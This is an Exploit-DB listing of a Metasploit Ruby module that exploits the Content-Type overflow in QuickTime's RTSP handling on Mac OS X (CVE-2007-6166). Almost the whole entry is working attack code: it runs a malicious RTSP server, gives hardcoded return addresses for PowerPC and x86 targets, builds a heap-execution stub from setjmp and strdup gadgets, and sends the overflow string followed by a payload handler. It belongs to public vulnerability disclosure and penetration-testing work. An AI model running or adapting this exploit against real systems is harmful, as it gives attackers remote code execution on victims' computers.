Apple QuickTime (Mac OSX) - RTSP Content-Type Overflow (Metasploit)

EDB-ID:

16873


Platform:

OSX

Published:

2010-10-09

##
# $Id: quicktime_rtsp_content_type.rb 10617 2010-10-09 06:55:52Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::TcpServer

	def initialize(info = {})
		super(update_info(info,
			'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow',
			# Description?
			# Author?
			'Version'  => '$Revision: 10617 $',
			'Platform' => 'osx',
			'References' =>
				[
					[ 'CVE', '2007-6166' ],
					[ 'OSVDB', '40876'],
					[ 'BID', '26549' ],
				],
			'Payload' =>
				{
					'Space' => 3841,
					'BadChars' => "\x00\x0a\x0d",
					'MaxNops' => 0,
					'StackAdjustment' => -3500,
				},
			'Targets' =>
				[
					[ 'Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0',
						{
							'Arch' => ARCH_PPC,
							'Ret' => 0x8fe3f88c,
							'RetOffset' => 551,
							'PayloadOffset' => 879
						}
					],

					[ 'Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1',
						{
							'Arch' => ARCH_PPC,
							'Ret' => 0x8fe042e0,
							'RetOffset' => 615,
							'PayloadOffset' => 3351
						}
					],

					[ 'Mac OS X 10.4.8 x86, QuickTime 7.1.3',
						{
							'Arch' => ARCH_X86,
							'Offset' => 307,
							'Writable' => 0xa0bd0f10,    # libSystem __IMPORT
							# The rest of these are all in libSystem __TEXT
							'ret' => 0x9015d336,
							'poppopret' => 0x9015d334,
							'setjmp' => 0x900bc438,
							'strdup' => 0x90012f40,
							'jmp_eax' => 0x9014a77f
						}
					],

					[ 'Mac OS X 10.5.0 x86, QuickTime 7.2.1',
						{
							'Arch' => ARCH_X86,
							'Offset' => 307,
							'Writable' => 0x8fe66448,  # dyld __IMPORT
							# The rest of these addresses are in dyld __TEXT
							'ret' => 0x8fe1ceee,
							'poppopret' => 0x8fe220d7,
							'setjmp' => 0x8fe1ceb0,
							'strdup' => 0x8fe1cd77,
							'jmp_eax' => 0x8fe01041
						}
					],

				],
			'DefaultTarget'  => 2,
			'DisclosureDate' => 'Nov 23 2007'))
	end

	######
	# XXX: This does not work on Tiger apparently
	def make_exec_payload_from_heap_stub()
		frag0 =
			"\x90" + # nop
			"\x58" + # pop eax
			"\x61" + # popa
			"\xc3"   # ret

		frag1 =
			"\x90" +             # nop
			"\x58" +             # pop eax
			"\x89\xe0" +         # mov eax, esp
			"\x83\xc0\x0c" +     # add eax, byte +0xc
			"\x89\x44\x24\x08" + # mov [esp+0x8], eax
			"\xc3"               # ret

		setjmp = target['setjmp']
		writable = target['Writable']
		strdup = target['strdup']
		jmp_eax = target['jmp_eax']

		exec_payload_from_heap_stub =
			frag0 +
			[setjmp].pack('V') +
			[writable + 32, writable].pack("V2") +
			frag1 +
			"X" * 20 +
			[setjmp].pack('V') +
			[writable + 24, writable, strdup, jmp_eax].pack("V4") +
			"X" * 4
	end

	def on_client_connect(client)
		print_status("Got client connection...")

		if (target['Arch'] == ARCH_PPC)
			ret_offset = target['RetOffset']
			payload_offset = target['PayloadOffset']

			# Create pattern sized up to payload, since it always follows
			# the return address.
			boom = Rex::Text.pattern_create(payload_offset)

			boom[ret_offset, 4] = [target['Ret']].pack('N')
			boom[payload_offset, payload.encoded.length] = payload.encoded
		else
			boom = Rex::Text.pattern_create(327)

			boom[307, 4] = [target['ret']].pack('V')
			boom[311, 4] = [target['ret']].pack('V')
			boom[315, 4] = [target['poppopret']].pack('V')
			boom[319, 4] = [target['Writable']].pack('V')
			boom[323, 4] = [target['Writable']].pack('V')

			#
			# Create exec-payload-from-heap-stub, but split it in two.
			# The first word must be placed as the overwritten saved ebp
			# in the attack string.  The rest is placed after the
			# Writable memory addresses.
			#
			magic = make_exec_payload_from_heap_stub()
			boom[303, 4] = magic[0, 4]
			boom += magic[4..-1]

			#
			# Place the payload immediately after the stub as it expects
			#
			boom += payload.encoded
		end

		body = " "
		header =
			"RTSP/1.0 200 OK\r\n"+
			"CSeq: 1\r\n"+
			"Content-Type: #{boom}\r\n"+
			"Content-Length: #{body.length}\r\n\r\n"

		print_status("Sending RTSP response...")
		client.put(header + body)

		print_status("Sleeping...")
		select(nil,nil,nil,1)

		print_status("Starting handler...")
		handler(client)

		print_status("Closing client...")
		service.close_client(client)
	end
end